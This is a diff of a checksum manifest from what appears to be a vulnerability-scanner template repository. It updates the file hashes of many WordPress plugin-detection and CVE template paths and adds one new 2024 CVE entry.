helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 helpers/wordpress/plugins/woocommerce-services.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 @@ -935,7 +935,7 @@ helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4de helpers/wordpress/plugins/wp-optimize.txt:1ee09476b338ca8261ad83be6aefa18693436588 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:0676d107698477ab3fa1a4f94a324657de0f87fd -helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:99d481ff0df2b58220e9d619c86ddce4d61e9726 +helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:d8c3854ca34a77499c02ddb33eac42b322bb70cb helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7c2 helpers/wordpress/plugins/wp-seopress.txt:60d712d9a12f5416daabb3565821281c3cba1d4c helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf @@ -946,7 +946,7 @@ helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f1 helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a helpers/wordpress/plugins/wpforms-lite.txt:62156312501df259d1213db5481c36daaa321adc -helpers/wordpress/plugins/wps-hide-login.txt:69e7167e89117a318c489d464a95dbda36c0d526 +helpers/wordpress/plugins/wps-hide-login.txt:1be4fc9641c219c2994e21840fa082208b93c1aa helpers/wordpress/plugins/wpvivid-backuprestore.txt:59d7e64657a8b97484f080d8c51a6652e22d2a14 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:bac19d8941e404675dba7142fecdc9ea1f371ad9 @@ -1963,7 +1963,7 @@ http/cves/2020/CVE-2020-27361.yaml:05e120b7de223a91a94eeee3b3849a2a3154f371 http/cves/2020/CVE-2020-27467.yaml:76b7fca1d3b0ad29b931134a22af2e4d4397cdb0 http/cves/2020/CVE-2020-27481.yaml:4b32a25c1171a8bbe3a79021d69aa408eb6b4d5c http/cves/2020/CVE-2020-27735.yaml:c11acea90495bacb3b3e5cd069b49cbc543621e7 -http/cves/2020/CVE-2020-27838.yaml:9118e7ed48a843d2446e4b9e81c272ebc4f6682e +http/cves/2020/CVE-2020-27838.yaml:edcfba1630f9ea7b0d31c4aaab3c0dce6007ebb0 http/cves/2020/CVE-2020-27866.yaml:94e95838349bf47e7bf695cdad78c991d81b11f2 http/cves/2020/CVE-2020-27982.yaml:7b9d9d3713e2acf86c532a6b9db417367ef24d89 http/cves/2020/CVE-2020-27986.yaml:893336c14059a046c22f8cd517e66893d0139361 @@ -3442,6 +3442,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 +http/cves/2024/CVE-2024-34102.yaml:4778f433073e71b97ced201c299db534a6b7e5ed http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 @@ -7212,227 +7213,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:7144512c253496afb47f75eddd28cfecc71f9678 -http/technologies/wordpress/plugins/add-to-any.yaml:07e7ea9fdbd8bf1a89e5c80f5510ec4ffb0c6b8d -http/technologies/wordpress/plugins/admin-menu-editor.yaml:b48651abeb751096d34e9d5e95005818054587e7 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:b75d7e725dfc8dd0c1c797880e6a994458f3511a -http/technologies/wordpress/plugins/akismet.yaml:d97426d0a7fcec8c7acc407ca285a09d896b7207 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:75ede4456663f2f0ff025f9aa5979f5d69bacb58 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:44e8ed9cfd6fc89505cf6f8df9d746bf7069c7e3 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0aa0e3f6a23ae3d96ff769f8c8f1539321b3b862 -http/technologies/wordpress/plugins/amp.yaml:bbef72c35230bf24754e45def88e3058ea6ee47d -http/technologies/wordpress/plugins/antispam-bee.yaml:dc80ed149f8578439985b3ab3f901777940c978e -http/technologies/wordpress/plugins/astra-sites.yaml:d934a8e1e9c61d9a68ce709146461049ff988d60 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:0d80f0e77b007e838bafbdb9a49eeb2ce74f32fc -http/technologies/wordpress/plugins/backwpup.yaml:56232a8fedaa5ff94792672b608ba0a35157b9dc -http/technologies/wordpress/plugins/better-search-replace.yaml:ae272c2c26ab7cd7e4a6a954b3eb9560f826d214 -http/technologies/wordpress/plugins/better-wp-security.yaml:0f748e48134cd88f0aa1d97e041ab573e06564da -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:8c7160c74e30d5a295993f8cece6e54fe94363d1 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:7290b88fcb6d597bd8edf5d84ff17f03ff5e7c32 -http/technologies/wordpress/plugins/breeze.yaml:a99b5de08ae2af79bfd17d90bb99e5a92a51e35c -http/technologies/wordpress/plugins/broken-link-checker.yaml:0e3a04e3388c8c616c26bb54131d282ebd9e7ab4 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:cb0672c883af42c4b7018e6c030c4eb657e21acc -http/technologies/wordpress/plugins/classic-editor.yaml:050067c4f6c66fb1aa7bfcfb8c3de4bba0839e7d -http/technologies/wordpress/plugins/classic-widgets.yaml:fb9070af9ac63d4271f2211ad369e83b9a631e98 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e1ede2f25691267c9e20c7a1a8241bd7ede597a6 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:9e0e3f13cf9b85800f0ccfaf3c12937fb37b7179 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:a7f33bcbdd54f96597e1bc71eb9676d22c655ebf -http/technologies/wordpress/plugins/coblocks.yaml:d10991be00aa549e3875b13ba41b232f3833820d -http/technologies/wordpress/plugins/code-snippets.yaml:cbe3e6723d4fd21a32d5874e7f5ae16548c96f06 -http/technologies/wordpress/plugins/coming-soon.yaml:86f62b325fe719ac8bda8b11d925a0e233029892 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:cb0b5a6265d7314946bd22507255d978b28fcb9e -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:645a0956741e001ed74c776b97cef598b483469e -http/technologies/wordpress/plugins/contact-form-7.yaml:d038a389414ad53651260dcebe6c68a03d9be173 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ce73fd62ad129b555167502d5a4589f2fb1bbb4a -http/technologies/wordpress/plugins/cookie-law-info.yaml:19222112ae07716117dbf10dc24a356e6fc02d23 -http/technologies/wordpress/plugins/cookie-notice.yaml:71967d0d5e857db161450d38e238ec145f54752b -http/technologies/wordpress/plugins/copy-delete-posts.yaml:73a548002cfc19a353400b2b97c5ec8dc1a0155c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:737d3754c3f20bbf045464e0e4dfebcf1d7a9002 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:f18bf33a997e46aa2524b82fe50ef294021f430e -http/technologies/wordpress/plugins/custom-css-js.yaml:7dd624cc65b8e4c0f91e8cfde6fc750ea17903da -http/technologies/wordpress/plugins/custom-fonts.yaml:ed94c48c31b9dd688e0d4d2a550c9137801950f8 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:b1fa18dc1f51264e1b75bb52ae3a431ff7c89067 -http/technologies/wordpress/plugins/disable-comments.yaml:3adc5bf97e8cfca6248a80f8871767ed47c307a9 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:b9c3da1b702544c6a880fd9f5f85265fcbb85345 -http/technologies/wordpress/plugins/duplicate-page.yaml:974a0b4ea7104db40fe733048c141e0b74cc4071 -http/technologies/wordpress/plugins/duplicate-post.yaml:dac4ce90f889b4cc1d1d0a4e91d5fcbb7397b3c9 -http/technologies/wordpress/plugins/duplicator.yaml:6ed03f5b2b30e83fa4a3d20667d8192e8fbf92e5 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:da47695b8724287e1a610c800dd659bae2dd40f8 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:61360e6f60107fd44221ceacbb4598c1c27a2b2d -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:976968c3877b6c53755875b2e8a7af056698e7f7 -http/technologies/wordpress/plugins/elementor.yaml:fac8837b7f4c3e212c496442869f559ad96499e8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e488dbee4e9ac653e5313b160f6b84a7869b9803 -http/technologies/wordpress/plugins/enable-media-replace.yaml:b73bd0a6732a20c3ddd7e753bebe53c401e03db2 -http/technologies/wordpress/plugins/envato-elements.yaml:75231eb5ae54102c701568a8d2c489c3af2bd558 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:f911b256e23d64db3ec4534fb35fe6184917298f -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:11e738bef19be4ef94475548200a2d0804aca628 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:acbc17bad67db4a276b365c2024fb0fe838d0fcd -http/technologies/wordpress/plugins/fast-indexing-api.yaml:ff1c79897656a8e71fe9f2b565a148a5c233ff8a -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:c41c57c828020f724a110efc154152516fe88e5b -http/technologies/wordpress/plugins/flamingo.yaml:d39e3f471d0cb075ca95fbbe298f46feaa90cb0a -http/technologies/wordpress/plugins/fluentform.yaml:5871c9d5450a4b76a927c3c78cbe626cc417f88e -http/technologies/wordpress/plugins/font-awesome.yaml:0ce5b4d8ce23fc7b2db320fd79d5a558091ad81f -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:c0495a7e91b03eefa9e00f14c6287ee8f8971706 -http/technologies/wordpress/plugins/formidable.yaml:2d09e9e15c586cd37bf8e2d6927a90c8a92b933f -http/technologies/wordpress/plugins/forminator.yaml:32dad1859d4947db037e01fd256b65dcd7598434 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:ad45a5332dd8c7cf07c0101df2a7a2cab8a9004a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:d04a78b740332a56d49540e80355d1531f100d5d -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8a2edf15240c177225237f75a519e109160f6952 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:c56c9432ab87a2a2d865d4a1bde191b118bde8bc -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d50919c980dca7478a0d331473d1fd63e561bbd1 -http/technologies/wordpress/plugins/google-site-kit.yaml:94bfb8106dd8211680c23b4ef225c4503a65811d -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:28e2ab58b72b338469aa8b7bd88990e431e5b869 -http/technologies/wordpress/plugins/gtranslate.yaml:1a5499e6ec80a3879d154b4b05de7fd46d52fe61 -http/technologies/wordpress/plugins/gutenberg.yaml:b28a3cd0946a7b720587f5e14a4e5b0238bad78f -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:e7453d7fd87a617fd1456c986433709dafd8d229 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:6201db5311280a9988255b1e3082bf392ea0a5c0 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b90e86495f89e41a64dfda4e6348269471c4aa5a -http/technologies/wordpress/plugins/header-footer.yaml:5468d121387655316159cc81c359f7e701207427 -http/technologies/wordpress/plugins/health-check.yaml:53899d0f70a4fa4d59f92b57d982afa456dd33cb -http/technologies/wordpress/plugins/hello-dolly.yaml:ade2f834b4627ce12e418966dfb533d33bb33514 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:4c9559d9c4f96865cd401e69c498d7714dd29c22 -http/technologies/wordpress/plugins/hostinger.yaml:390f9c2c3e1b1fcabc357fcf59e54fc3eb0fdd24 -http/technologies/wordpress/plugins/image-optimization.yaml:793b3ccb5322aaf292b0df166226f7599517b277 -http/technologies/wordpress/plugins/imagify.yaml:7fca493a2325ffa6e0029bed8e0c51941279e4a8 -http/technologies/wordpress/plugins/imsanity.yaml:69e3b5ff5d4790eed92b0f826b49c96a184eb925 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:1368559daebd8a220471d151ccbdf4771eedf204 -http/technologies/wordpress/plugins/instagram-feed.yaml:083bd6f9b8e5ca93c43b0894c5b21f48820ab3c5 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:e8f2f99244fc7642cf92b5f815df4d63a2ec5868 -http/technologies/wordpress/plugins/iwp-client.yaml:a96f0c404dbb61b39a37ada15c779c9128c18c65 -http/technologies/wordpress/plugins/jetpack-boost.yaml:79c214ace879c4da774961f8f0e1f603166b7639 -http/technologies/wordpress/plugins/jetpack.yaml:6853a11a7f628dd15a09ea57138fc873306d0da7 -http/technologies/wordpress/plugins/kadence-blocks.yaml:ea1192655d7be7f9afc98ea6cfc51b3f45f8de21 -http/technologies/wordpress/plugins/kirki.yaml:cd8f703aa74d3c0af6bf123ddea14ba537d914fa -http/technologies/wordpress/plugins/leadin.yaml:cbe172cbea1a9dd5229409e065ed5f312c1f490b -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:38a541b4fe87117b859ed86efa6756a3e4bc6283 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:b40240f48684dc01c57cb10b9f2f4874b365bcd5 -http/technologies/wordpress/plugins/litespeed-cache.yaml:0f1ada893f89f28a90879c947531e9e5c9f3ef77 -http/technologies/wordpress/plugins/loco-translate.yaml:1933186a1b4601fc1b0dd82a1581bc31d7146054 -http/technologies/wordpress/plugins/loginizer.yaml:56a55bc8c81786c62c3a7ff28fb1781c2fc6bc02 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/iwp-client.yaml:b435ab5520345df3f78f16697923cb8b5e529692 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:c8289919fa40414894f7e743286d9190e10988c7 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:a4a9fea24a76366732074c995322f86fa2299c54 -http/technologies/wordpress/plugins/mailpoet.yaml:6a06b920167398f0ef6babffa4e6acbc4427df99 -http/technologies/wordpress/plugins/maintenance.yaml:0e1b66fa9307b0236d1f398c0ea23af25567580e -http/technologies/wordpress/plugins/mainwp-child.yaml:f48c0ed339a0b59dfeb871e3748ce70203923253 -http/technologies/wordpress/plugins/malcare-security.yaml:e91a3ebb66d94f69929ed1fa2008c9082206dc59 -http/technologies/wordpress/plugins/megamenu.yaml:dc48b2a084787051c2181761c05f03ed750c67ef -http/technologies/wordpress/plugins/members.yaml:a87f26995af17cb3c5d3b60f84b32b27236adc76 -http/technologies/wordpress/plugins/meta-box.yaml:f2d093286e27c711b5091d463d19e9f6a4ce1b65 -http/technologies/wordpress/plugins/metform.yaml:d9b2af272fe0eda17f7bc1a27803af065ca62b39 -http/technologies/wordpress/plugins/ml-slider.yaml:5c66904a7e71ef773978374f89e0f5d61b7691d9 -http/technologies/wordpress/plugins/newsletter.yaml:d83720e47acfbc5c1a6fe8f22b82264b8bbf9892 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:b1006fd98b9288f53b1646e44b121fc126cb74c7 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6ee11c223abfd3aeb3ef02d7d97f24902ed081ac -http/technologies/wordpress/plugins/ninja-forms.yaml:2c45242bf29f107bcc0c93e0917b60982d824d08 -http/technologies/wordpress/plugins/ocean-extra.yaml:33fe84efd00b4d86939439b4a7056140d9cbf895 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:f4f56219287278208e09d52e207cd43c1f087605 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:075242471660178a1478dea8729ccad21317fd96 -http/technologies/wordpress/plugins/optinmonster.yaml:a84731dc46b71b2a8b68f9f13afd21ff05a39e8c -http/technologies/wordpress/plugins/otter-blocks.yaml:fd27fce434fa8725c6f6db4069623ba38445c3ef -http/technologies/wordpress/plugins/password-protected.yaml:e87dba915b230b76fe45bbcae40447861c8d9d42 -http/technologies/wordpress/plugins/pdf-embedder.yaml:92368fe9a839d1ed944f6385cb7ad793170589db +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 